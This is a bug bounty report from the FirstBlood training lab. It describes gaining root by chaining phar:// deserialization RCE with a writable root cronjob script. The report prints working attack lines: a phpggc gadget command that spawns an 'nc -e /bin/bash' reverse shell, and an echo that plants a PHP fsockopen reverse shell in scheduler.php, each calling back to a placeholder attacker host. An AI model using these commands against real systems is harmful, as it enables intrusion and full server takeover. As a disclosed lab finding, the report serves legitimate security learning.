FirstBlood-#916FirstBlood server Rooted!
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-30, newrouge Level 3 reported:

Hey, I would like to report that it's possible to get root user on firstblood server, due to some insecure cronjobs running by root user and user fb-exec have write permission over it, and low privilge user can escalate to root by abusing it.

  • As i mentioned in report (https://www.bugbountyhunter.com/hackevents/report?id=622), that it is possible to get RCE due to insecure deserialization by adding the phar:// stream handler to the path of proof uploaded.

steps:

  1. Upload a malicious generated phar file on server with payload.

    nc -e /bin/bash <YOUR_IP> <PORT>

    ./phpggc -pj test.jpg -o test.phar monolog/rce1 system "nc -e /bin/bash <ip> <port>

  2. Upload this file on server, and capture the proof request, and append phar:// stream to path.

  3. Have your listener ready and send the request.

  4. Now let's do some recon we find another directory inside /app named docker.

  5. Inside it we find that cronjob is running on server

  6. Let's see what that scheduler.php script is

  7. And fb-exec user have write permission over that file.

    Uhhh here we go again, Patrcie!

  8. Let's put our php reverse shell in this scheduler.php file, and start a listener on other port on our local machine,

      echo '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");' >> scheduler.php
  9. Now wait for a moment and , and you will get shell as root user.

Impact:

  • Firstblooded

Thank you & sorry for little meme i hope that's ok :)

Regards newrouge

P1 CRITICAL

Parameter:

Payload:


FirstBlood ID: 35
Vulnerability Type: RCE

A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.

Report Feedback

@zseano

Creator & Administrator


Nice dog meme! ;)